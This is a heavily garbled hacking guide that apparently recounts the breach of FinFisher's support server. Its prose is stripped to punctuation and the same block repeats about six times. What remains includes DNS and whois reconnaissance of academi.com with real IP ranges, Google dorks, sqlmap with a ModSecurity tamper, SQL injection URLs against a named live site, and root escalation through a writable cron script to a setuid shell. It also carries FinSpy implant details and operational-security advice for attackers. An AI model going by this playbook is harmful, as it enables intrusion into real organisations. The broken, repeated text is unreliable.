fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
